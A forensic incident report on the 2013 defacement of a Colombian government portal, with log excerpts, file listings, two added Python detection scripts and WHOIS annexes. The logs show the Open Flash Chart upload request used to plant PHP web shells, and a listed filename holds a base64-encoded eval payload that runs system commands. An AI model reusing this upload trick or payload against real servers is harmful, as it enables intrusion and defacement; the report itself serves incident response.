Incident report 18-09-2013


Bogotá, Colombia Ver 4.0 04-08 GARS

INCIDENT REPORT

Incident No: IM626153
Report progress: FINAL
Event zone: BOGOTA
Event date and time: 18-09-2013
Event reported by: ETB
Solution date and time: 19-09-2013
Event type: Forensic Analysis Report

Event description

On 18 September 2013 at around 09:50 AM it was reported that the web portal www.supernotariado.gov.co had been modified without any maintenance having been performed on it. The evidence image below shows that, when the client's page is opened, a notice appears stating that the site was attacked:

Affected services

Superintendencia de Notariado y Registro

Progress

Day    Time    Description of progress


1. Evidence collection

Evidence collection begins with the extraction of the following data:

- Access logs of the attacked sites.
- Error logs of the attacked sites.
- Information on, and copies of, the files uploaded to the portal.
- Information on, and copies of, the files modified on the portal.

2. Case analysis

The access logs for 18 September were checked and the following evidence was found:

[seguridad@snrportal2 apacheSSL]$ grep POST saccess_log | grep -v ChartSBNR | grep -v 404

103.6.96.26 - - [18/Sep/2013:00:01:11 -0500] "POST /portalsnr/index.php%3foption=com_jnews%26act=mailing%26task=view%26listid=18%26mailingid=8%26listype=1%26Itemid=999/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 400 226
103.6.96.26 - - [18/Sep/2013:00:01:14 -0500] "POST /portalsnr/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 303 -
103.6.96.26 - - [18/Sep/2013:00:01:14 -0500] "POST /portalsnr/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 303 -
188.40.17.97 - - [18/Sep/2013:02:44:17 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=indo.php HTTP/1.1" 200 51
188.40.17.97 - - [18/Sep/2013:02:44:18 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=botol.php HTTP/1.1" 200 52
188.40.17.97 - - [18/Sep/2013:02:44:18 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=botol.php HTTP/1.1" 200 52
188.40.17.97 - - [18/Sep/2013:02:44:18 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=bokek.php HTTP/1.1" 200 52
188.40.17.97 - - [18/Sep/2013:02:44:19 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=bokek.php HTTP/1.1" 200 52
110.45.146.219 - - [18/Sep/2013:02:44:35 -0500] "POST http://210.166.214.92:6667/ HTTP/1.0" 200 88
188.40.17.97 - - [18/Sep/2013:02:55:44 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=indo.php HTTP/1.1" 200 51
188.40.17.97 - - [18/Sep/2013:02:55:44 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=botol.php HTTP/1.1" 200 52
188.40.17.97 - - [18/Sep/2013:02:58:45 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=bokek.php HTTP/1.1" 200 52
188.40.17.97 - - [18/Sep/2013:02:58:45 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=bokek.php HTTP/1.1" 200 52
90.188.238.17 - - [18/Sep/2013:03:21:56 -0500] "POST /portalsnr/index.php?option=com_jnews&act=mailing&task=view&listid=18&mailingid=8&listype=1&Itemid=999/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 303 -
90.188.238.17 - - [18/Sep/2013:03:21:57 -0500] "POST /portalsnr/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 303 -
90.188.238.17 - - [18/Sep/2013:03:21:56 -0500] "POST /portalsnr/index.php?option=com_jnews&act=mailing&task=view&listid=18&mailingid=8&listype=1&Itemid=999/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 303 -
90.188.238.17 - - [18/Sep/2013:03:21:56 -0500] "POST /portalsnr/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 303 -
77.245.151.239 - - [18/Sep/2013:06:20:08 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=indo.php HTTP/1.1" 200 51
77.245.151.239 - - [18/Sep/2013:06:20:09 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=botol.php HTTP/1.1" 200 52
77.245.151.239 - - [18/Sep/2013:06:20:09 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=bokek.php HTTP/1.1" 200 52
77.245.151.239 - - [18/Sep/2013:06:28:15 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=indo.php HTTP/1.1" 200 51
77.245.151.239 - - [18/Sep/2013:06:28:16 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=botol.php HTTP/1.1" 200 52
77.245.151.239 - - [18/Sep/2013:06:28:16 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=bokek.php HTTP/1.1" 200 52
31.172.251.234 - - [18/Sep/2013:08:15:31 -0500] "POST /portalsnr//components//contact.php HTTP/1.1" 200 114934
81.130.21.114 - - [18/Sep/2013:08:32:26 -0500] "POST /portalsnr//components//contact.php HTTP/1.1" 200 86351
81.130.21.114 - - [18/Sep/2013:08:36:57 -0500] "POST /portalsnr//components//contact.php HTTP/1.1" 200 85764
81.130.21.114 - - [18/Sep/2013:08:39:42 -0500] "POST /portalsnr//components//contact.php HTTP/1.1" 200 60158
188.40.17.97 - - [18/Sep/2013:08:47:31 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=indo.php HTTP/1.1" 200 51
188.40.17.97 - - [18/Sep/2013:08:47:31 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=botol.php HTTP/1.1" 200 52
188.40.17.97 - - [18/Sep/2013:08:47:31 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=botol.php HTTP/1.1" 200 52
188.40.17.97 - - [18/Sep/2013:08:47:32 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=bokek.php HTTP/1.1" 200 52
188.40.17.97 - - [18/Sep/2013:08:47:35 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=bokek.php HTTP/1.1" 200 52
110.45.146.219 - - [18/Sep/2013:08:48:15 -0500] "POST http://210.166.214.92:6667/ HTTP/1.0" 200 88
134.3.82.219 - - [18/Sep/2013:08:56:41 -0500] "POST /supernotariado/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 303 -
134.3.82.219 - - [18/Sep/2013:08:56:41 -0500] "POST /supernotariado/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 303 -
134.3.82.219 - - [18/Sep/2013:08:56:42 -0500] "POST /supernotariado/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 303 -
134.3.82.219 - - [18/Sep/2013:08:56:46 -0500] "POST /supernotariado/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 303 -
91.221.0.124 - - [18/Sep/2013:09:12:44 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=default.php HTTP/1.1" 200 54
118.97.212.185 - - [18/Sep/2013:09:26:38 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/default.php HTTP/1.1" 200 475
118.97.212.185 - - [18/Sep/2013:09:30:09 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/store.php?act=ls&d=%2Fhtdocs%2Fportalsnr%2F&sort=0a HTTP/1.1" 200 6737
77.245.151.239 - - [18/Sep/2013:10:05:00 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=indo.php HTTP/1.1" 200 51
77.245.151.239 - - [18/Sep/2013:10:05:05 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=botol.php HTTP/1.1" 200 52
77.245.151.239 - - [18/Sep/2013:10:05:19 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=bokek.php HTTP/1.1" 200 52
77.245.151.239 - - [18/Sep/2013:10:47:03 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=indo.php HTTP/1.1" 200 51
77.245.151.239 - - [18/Sep/2013:10:47:04 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=botol.php HTTP/1.1" 200 52
77.245.151.239 - - [18/Sep/2013:10:47:05 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=bokek.php HTTP/1.1" 200 52

The log shows POST requests to the server whose name parameter references a file with a .php extension.
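As an added example (it is not part of the report and not GARS's tooling), the following Python script applies the same triage the analysts did by hand to an Apache access log: it flags POSTs to the Open Flash Chart upload script whose name parameter is not an image, POSTs that execute files inside tmp-upload-images, and POSTs whose target is an absolute URL to another host. The endpoint and directory paths are those named in the report; the set of accepted image extensions is an assumption, and the 10.0.0.5 chart.png line in the sample is constructed to show that a genuine image upload is not flagged.

```python
import re
from datetime import datetime
from urllib.parse import urlsplit, parse_qs

# Apache common/combined log line, in the layout of the saccess_log excerpt above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)

# Paths from the report: the Open Flash Chart upload script and the directory it writes to.
UPLOAD_ENDPOINT = "/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php"
UPLOAD_DIR = "/components/com_jnews/includes/openflashchart/tmp-upload-images/"
# Assumption: the only file types a chart-image uploader should ever legitimately receive.
IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif"}


def parse_line(line):
    """Split one access-log line into fields; return None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def classify(rec):
    """Label a parsed POST as suspicious, or return None if nothing stands out."""
    if rec["method"] != "POST":
        return None
    url = urlsplit(rec["target"])
    if url.scheme in ("http", "https"):
        # Absolute URL to another host: the server is being used as a forward proxy.
        return "absolute-uri-target:" + url.netloc
    if url.path.endswith(UPLOAD_ENDPOINT):
        name = parse_qs(url.query).get("name", [""])[0]
        ext = name[name.rfind("."):].lower() if "." in name else ""
        if ext not in IMAGE_EXTS:
            # A script name handed to an image uploader, exactly what the report shows.
            return "upload-non-image:" + name
    if UPLOAD_DIR in url.path:
        # A request *into* the upload directory means an uploaded file is being executed.
        return "post-to-upload-dir:" + url.path.rsplit("/", 1)[-1]
    return None


def scan(lines):
    """Return one finding per suspicious line: source ip, timestamp and label."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        label = classify(rec)
        if label:
            findings.append({"ip": rec["ip"], "ts": rec["ts"].isoformat(), "finding": label})
    return findings


def by_ip(findings):
    """Group findings by source address, so each address can be taken to WHOIS (Annex 1)."""
    grouped = {}
    for f in findings:
        grouped.setdefault(f["ip"], []).append(f["finding"])
    return grouped


# Sample input: six lines copied from the report's log excerpt plus one constructed
# benign upload (10.0.0.5, chart.png) that must pass without a finding.
SAMPLE_LOG = [
    '188.40.17.97 - - [18/Sep/2013:02:44:17 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=indo.php HTTP/1.1" 200 51',
    '110.45.146.219 - - [18/Sep/2013:02:44:35 -0500] "POST http://210.166.214.92:6667/ HTTP/1.0" 200 88',
    '31.172.251.234 - - [18/Sep/2013:08:15:31 -0500] "POST /portalsnr//components//contact.php HTTP/1.1" 200 114934',
    '91.221.0.124 - - [18/Sep/2013:09:12:44 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=default.php HTTP/1.1" 200 54',
    '118.97.212.185 - - [18/Sep/2013:09:26:38 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/default.php HTTP/1.1" 200 475',
    '118.97.212.185 - - [18/Sep/2013:09:30:09 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/store.php?act=ls&d=%2Fhtdocs%2Fportalsnr%2F&sort=0a HTTP/1.1" 200 6737',
    '10.0.0.5 - - [18/Sep/2013:09:40:00 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=chart.png HTTP/1.1" 200 51',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["finding"])
```

Run it as-is to see the findings for the sample; on a real server, pass the open log file to scan() instead of SAMPLE_LOG. The contact.php line and the constructed chart.png upload produce no finding, which is the point: the rule keys on what the upload endpoint is asked to store, not on POST volume.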

Resolving the URL https://supernotariado.gov.co/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/default.php displays the interface of a web shell.

A test was performed by uploading a text file named Prueba.txt, resolving the URL: supernotariado.gov.co/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=prueba.txt

A message is displayed stating that the file is being saved to the path …/tmp-upload-images/prueba.txt. From this it is concluded that the attacker exploited a vulnerability in a component of Open Flash Chart, ofc_upload_image.php, to create the file default.php and, through it, access the site and install the malicious files. Files created through this component are stored under /htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/*

Next, the accesses to the path /htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/* were reviewed, finding the following evidence:

stat /htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/*

Common to every entry: directory /htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/, IO Block: 4096, Device: fd08h/64776d, Links: 1, Access: (0644/-rw-r--r--), Uid: (508/usrnotariado), Gid: (509/notariado); all timestamps are -0500. Entries of size 0 are reported by stat as "regular empty file", the rest as "regular file".

File                 Size    Blocks  Inode     Access               Modify               Change
abc.php              431     8       24281260  2013-09-18 11:15:29  2013-08-06 13:54:26  2013-08-06 13:54:26
admin.php            61830   136     24281585  2013-09-18 11:15:30  2013-09-12 11:10:36  2013-09-12 11:10:36
aka.php              240709  480     24281391  2013-09-18 11:15:30  2013-09-03 04:31:32  2013-09-03 04:31:32
a.php                2070    8       24281381  2013-09-18 11:15:30  2013-09-13 10:52:53  2013-09-13 10:52:53
bokek.php            17044   40      24281551  2013-09-18 11:15:30  2013-09-18 10:47:05  2013-09-18 10:47:05
botis.php            0       0       24281605  2013-09-18 11:15:30  2013-09-17 15:51:37  2013-09-17 15:51:37
botol.php            776     8       24281606  2013-09-18 11:15:30  2013-09-18 10:47:04  2013-09-18 10:47:04
bot.php              770     8       24281604  2013-09-18 11:15:29  2013-09-17 15:46:37  2013-09-17 15:46:37
cal.php              478     8       24281382  2013-09-18 11:15:30  2013-09-16 06:42:55  2013-09-16 06:42:55
cams.php             0       0       24281598  2013-09-18 11:15:30  2013-09-17 00:00:32  2013-09-17 00:00:32
default.php          613     8       24281392  2013-09-18 11:17:10  2013-09-18 09:12:44  2013-09-18 09:12:44
edit.php             61634   136     24281363  2013-09-18 11:15:30  2013-08-16 18:56:21  2013-08-16 18:56:21
();eval(base64_decode(JHM9cGhwX3VuYW1lKCk7CmVjaG8gJzxicj4nLiRzOwoKZWNobyAnPGJyPic7CnBhc3N0aHJ1KGlkKTsK));error
                     0       0       24281343  2013-09-18 11:15:30  2013-08-21 08:28:51  2013-08-21 08:28:51
home.php             73380   152     24281597  2013-09-18 11:15:30  2013-09-13 23:54:30  2013-09-13 23:54:30
hun2.php             68437   144     24281271  2013-09-18 11:15:30  2013-08-15 03:41:41  2013-08-15 03:41:41
inbox.php            12062   24      24281559  2013-09-18 11:15:30  2013-09-03 23:31:20  2013-09-03 23:31:20
indo.php             1524    8       24281599  2013-09-18 11:15:30  2013-09-18 10:47:03  2013-09-18 10:47:03
ipays.php            240131  480     24281600  2013-09-18 11:15:30  2013-09-15 14:23:54  2013-09-15 14:23:54
ip.txt               66      8       24281577  2013-09-18 11:15:30  2013-09-06 23:00:52  2013-09-06 23:00:52
kliverz.php          3957    8       24281570  2013-09-18 11:15:29  2013-09-17 18:12:34  2013-09-17 18:12:34
load.php             2442    8       24281576  2013-09-18 11:15:30  2013-09-06 22:59:10  2013-09-06 22:59:10
localhost.php        3973    8       24281580  2013-09-18 11:15:29  2013-09-12 10:53:42  2013-09-12 10:53:42
menu.php             73195   152     24281550  2013-09-18 11:15:30  2013-09-18 09:26:40  2013-09-18 09:26:40
own.php              62587   136     24281560  2013-09-18 11:15:30  2013-09-04 00:22:10  2013-09-04 00:22:10
pass.php             41080   88      24281601  2013-09-18 11:15:30  2013-09-16 14:31:33  2013-09-16 14:31:33
php.ini              373     8       24281325  2013-09-18 11:15:30  2013-08-13 15:47:48  2013-08-13 15:48:08
pload.php            474     8       24281305  2013-09-18 11:15:30  2013-09-15 14:09:22  2013-09-15 14:09:22
proc.php             134566  272     24281578  2013-09-18 11:15:30  2013-09-06 23:00:52  2013-09-06 23:00:52
prueba.txt           0       0       24281553  2013-09-18 11:25:08  2013-09-18 11:25:08  2013-09-18 11:25:08
Prueba.txt           19      8       24281552  2013-09-18 11:15:30  2013-09-18 10:51:13  2013-09-18 10:51:13
readme.php           73766   160     24281331  2013-09-18 11:15:30  2013-08-27 23:53:37  2013-08-27 23:53:37
shell.php            1524    8       24281602  2013-09-18 11:15:30  2013-09-17 15:43:36  2013-09-17 15:43:36
store.php            73780   160     24281281  2013-09-18 11:15:30  2013-09-07 09:04:09  2013-09-07 09:04:09
tux.php              58128   128     24281320  2013-09-18 11:15:30  2013-08-13 15:43:39  2013-08-13 15:43:39
wp-app.php           101722  208     24281590  2013-09-18 11:15:30  2013-09-13 10:53:09  2013-09-13 10:53:09

This shows that the files being uploaded to the site, both through the web shell and through the Open Flash Chart vulnerability, are stored in this folder. As the listing shows, the files default.php and prueba.txt are present in it.

Likewise, a search for the most recently modified files on the client's site was performed, finding the following references:

/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/kliverz.php
/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/bot.php
/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/indo.php
/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/shell.php
/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/menu.php
/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/bokek.php
/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/botis.php
/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/botol.php
/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/default.php
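An added example, not from the report: it reproduces in Python the two checks the analysts ran against tmp-upload-images, namely which non-image files the directory holds (newest modification first) and which upload request from the access log created each one, matched by file name and by the file's mtime falling within a few seconds of the request. The directory is rebuilt in a temporary folder carrying the modification times the stat output shows for default.php, indo.php, bokek.php and Prueba.txt; the upload events are the three corresponding log lines from the report. The chart.png entry, the placeholder file contents and the five-second matching window are constructed assumptions.

```python
import os
import shutil
import tempfile
from datetime import datetime, timedelta, timezone

TZ = timezone(timedelta(hours=-5))   # every timestamp in the report is -0500
IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif"}   # assumption: what the directory should hold


def audit_upload_dir(path):
    """List every regular file in an image-upload directory that is not an image,
    newest modification first. Anything listed is suspect: this directory should
    only ever receive chart images."""
    findings = []
    for entry in os.scandir(path):
        if not entry.is_file():
            continue
        if os.path.splitext(entry.name)[1].lower() in IMAGE_EXTS:
            continue
        st = entry.stat()
        findings.append({
            "name": entry.name,
            "size": st.st_size,
            "mtime": datetime.fromtimestamp(st.st_mtime, TZ),
        })
    findings.sort(key=lambda f: f["mtime"], reverse=True)
    return findings


def correlate(findings, upload_events, window=timedelta(seconds=5)):
    """Map each suspect file to the source IP of the upload request that created it:
    same name, and mtime within `window` of the request time. None if no request fits."""
    result = {}
    for f in findings:
        match = None
        for ev in upload_events:
            if ev["name"] == f["name"] and abs(f["mtime"] - ev["ts"]) <= window:
                match = ev["ip"]
                break
        result[f["name"]] = match
    return result


def build_sample_dir():
    """Constructed stand-in for tmp-upload-images: a temp directory whose files carry
    the modification times the report's stat output shows for those names."""
    d = tempfile.mkdtemp(prefix="tmp-upload-images-")
    samples = {
        "indo.php": datetime(2013, 9, 18, 10, 47, 3, tzinfo=TZ),
        "bokek.php": datetime(2013, 9, 18, 10, 47, 5, tzinfo=TZ),
        "default.php": datetime(2013, 9, 18, 9, 12, 44, tzinfo=TZ),
        "Prueba.txt": datetime(2013, 9, 18, 10, 51, 13, tzinfo=TZ),
        "chart.png": datetime(2013, 9, 18, 8, 0, 0, tzinfo=TZ),   # constructed benign image
    }
    for name, mtime in samples.items():
        p = os.path.join(d, name)
        with open(p, "w") as fh:
            fh.write("placeholder content, not the real file\n")   # constructed
        os.utime(p, (mtime.timestamp(), mtime.timestamp()))
    return d


# Upload requests taken from the access-log lines quoted in the report.
UPLOAD_EVENTS = [
    {"ip": "91.221.0.124", "ts": datetime(2013, 9, 18, 9, 12, 44, tzinfo=TZ), "name": "default.php"},
    {"ip": "77.245.151.239", "ts": datetime(2013, 9, 18, 10, 47, 3, tzinfo=TZ), "name": "indo.php"},
    {"ip": "77.245.151.239", "ts": datetime(2013, 9, 18, 10, 47, 5, tzinfo=TZ), "name": "bokek.php"},
]


def run_demo():
    """Build the sample directory, audit it, correlate, clean up; return (order, matches)."""
    d = build_sample_dir()
    try:
        findings = audit_upload_dir(d)
        return [f["name"] for f in findings], correlate(findings, UPLOAD_EVENTS)
    finally:
        shutil.rmtree(d)


if __name__ == "__main__":
    order, matches = run_demo()
    for name in order:
        print(f"{name:14s} uploaded by {matches[name] or 'no matching request'}")
```

Against the sample, chart.png is never listed, the four remaining files come out newest first, and Prueba.txt (the analysts' own test upload, which has no POST in the excerpt) is reported with no matching request. On a live system the same correlate() call takes the findings from audit_upload_dir() on the real directory and the upload events extracted from the access log.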


3. Results and conclusions

The investigation found that the file modifications were made possible by a vulnerability in a component called Open Flash Chart, through which a file was created that granted access to the site and therefore allowed the attacker to upload malicious files to it.

The Open Flash Chart component is installed at SNR's request, in compliance with the GEL manuals' requirement for continuous information to citizens.

Based on the validations performed, and since the latest version of the Open Flash Chart component is already in use, the component was blocked, remediating the vulnerability, and a search is under way for a security patch that hardens it.

SNR is advised to implement control over the access to, and upload of, content to the web portal by its content managers, so as to keep a history of all such files. This in turn makes it possible to install antivirus software (tests were carried out with the ClamAV antivirus, which detected and removed the malicious files) that scans the files created in this location every hour, so that if a vulnerability is exploited and the attacker uploads a malicious file to the server, it is detected and reported and action can be taken immediately.

ANNEX 1. INFORMATION ON THE IP ADDRESSES RELATED TO THE ATTACK

118.97.212.185

% APNIC found the following authoritative answer from: whois.apnic.net

% [whois.apnic.net]

% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html

% Information related to '118.97.208.0 - 118.97.223.255'

inetnum: 118.97.208.0 - 118.97.223.255

netname: TLKM_NAS_AST_CUSTOMER

country: ID

descr: PT TELKOM INDONESIA

descr: Menara Multimedia Lt. 7

descr: Jl. Kebonsirih No.12

descr: JAKARTA

admin-c: AR165-AP

tech-c: HM444-AP

status: ASSIGNED NON-PORTABLE


mnt-by: MAINT-TELKOMNET

mnt-irt: IRT-IDTELKOM-ID

changed: [email protected] 20101202

source: APNIC

irt: IRT-IDTELKOM-ID

address: PT. TELKOM INDONESIA

address: Menara Multimedia Lt. 7

address: Jl. Kebon sirih No.12

address: JAKARTA

e-mail: [email protected]

abuse-mailbox: [email protected]

admin-c: DF99-AP

tech-c: AR165-AP

mnt-by: MAINT-TELKOMNET

changed: [email protected] 20120420

changed: [email protected] 20120420

source: APNIC

role: PT Telkom Indonesia APNIC Resources Management

address: PT. TELKOM INDONESIA

address: Menara Multimedia Lt. 7

address: Jl. Kebonsirih No.12

address: JAKARTA

country: ID

phone: +62-21-3860500

fax-no: +62-21-3861215

e-mail: [email protected]

admin-c: HM444-AP


tech-c: HM444-AP

nic-hdl: AR165-AP

notify: [email protected]

mnt-by: MAINT-TELKOMNET

changed: [email protected] 20060105

source: APNIC

person: PT Telkom Indonesia Hostmaster

nic-hdl: HM444-AP

e-mail: [email protected]

address: PT. TELKOM INDONESIA

address: Menara Multimedia Lt. 7

address: Jl. Kebonsirih No.12

address: JAKARTA

phone: +62-21-3860500

fax-no: +62-21-3861215

country: ID

notify: [email protected]

mnt-by: MAINT-TELKOMNET

changed: [email protected] 20060105

source: APNIC

% Information related to '118.97.208.0/20AS17974'

route: 118.97.208.0/20

descr: PT. TELKOM INDONESIA

descr: Menara Multimedia Lt. 7

descr: Jln. Kebonsirih No.12

descr: JAKARTA

country: ID


origin: AS17974

mnt-by: MAINT-TELKOMNET

changed: [email protected] 20130612

source: APNIC

% This query was served by the APNIC Whois Service version 1.68 (UNDEFINED)

77.245.151.239

% This is the RIPE Database query service.

% The objects are in RPSL format.

%

% The RIPE Database is subject to Terms and Conditions.

% See http://www.ripe.net/db/support/db-terms-conditions.pdf

% Note: this output has been filtered.

% To receive output for a database update, use the "-B" flag.

% Information related to '77.245.144.0 - 77.245.159.255'

inetnum: 77.245.144.0 - 77.245.159.255
netname: TR-NIOBE-20070427
descr: Niobe Bilisim Teknolojileri Yazilim San. Tic. Ltd. Sti.
country: US
org: ORG-NB14-RIPE
admin-c: CY77-RIPE
tech-c: FB3777-RIPE
status: ALLOCATED PA
mnt-by: RIPE-NCC-HM-MNT
mnt-lower: NIOBE-MNT
mnt-routes: NIOBE-MNT
source: RIPE #Filtered

organisation: ORG-NB14-RIPE
org-name: Niobe Bilisim Teknolojileri Yazilim San. Tic. Ltd. Sti.
org-type: LIR
address: Niobe Hosting LLC
address: Fatih BIBEROGLU
address: 501 Silverside Road ste 105
address: 19809 Wilmington DE
address: UNITED STATES
phone: +13022950953
fax-no: +13022950953
admin-c: CY77-RIPE
admin-c: FB3777-RIPE
mnt-ref: NIOBE-MNT
mnt-ref: RIPE-NCC-HM-MNT
mnt-by: RIPE-NCC-HM-MNT
source: RIPE #Filtered

person: Cuneyt Yagiz
org: ORG-NB14-RIPE
address: 501 Silverside Road ste 105
address: Wilmington DE 19809
address: USA
mnt-by: NIOBE-MNT
phone: +1-3022950953
remarks: ###################################
remarks: Abuse & intrusion reports should
remarks: be sent to: [email protected]
remarks: ###################################
nic-hdl: CY77-RIPE
source: RIPE #Filtered

person: Fatih BIBEROGLU
org: ORG-NB14-RIPE
address: 501 Silverside Rd Ste 105
address: Wilmington DE 19809 USA
mnt-by: NIOBE-MNT
phone: +1 302-2950953
remarks: ###################################
remarks: Abuse and intrusion reports should
remarks: be sent to: [email protected]
remarks: ###################################
nic-hdl: FB3777-RIPE
source: RIPE #Filtered

% Information related to '77.245.144.0/20AS42868'

route: 77.245.144.0/20
descr: CMBM
origin: AS42868
mnt-by: NIOBE-MNT
source: RIPE #Filtered


% This query was served by the RIPE Database Query Service version 1.68.1 (WHOIS3)

91.221.0.124

% This is the RIPE Database query service.

% The objects are in RPSL format.

%

% The RIPE Database is subject to Terms and Conditions.

% See http://www.ripe.net/db/support/db-terms-conditions.pdf

% Note: this output has been filtered.

% To receive output for a database update, use the "-B" flag.

% Information related to '91.221.0.0 - 91.221.1.255'

inetnum: 91.221.0.0 - 91.221.1.255
netname: E-MORDOVIA
descr: SUE of RM "SPC of Informatization and New Technologies"
country: RU
org: ORG-SIaN1-RIPE
admin-c: AI1814-RIPE
tech-c: AI1814-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-END-MNT
mnt-lower: RIPE-NCC-END-MNT
mnt-by: MNT-INTRM
mnt-routes: MNT-INTRM
mnt-domains: MNT-INTRM
source: RIPE #Filtered

organisation: ORG-SIaN1-RIPE
org-name: SUE of RM "SPC of Informatization and New Technologies"
org-type: OTHER
address: Communist str. 13
address: Saransk, 430000, Russia
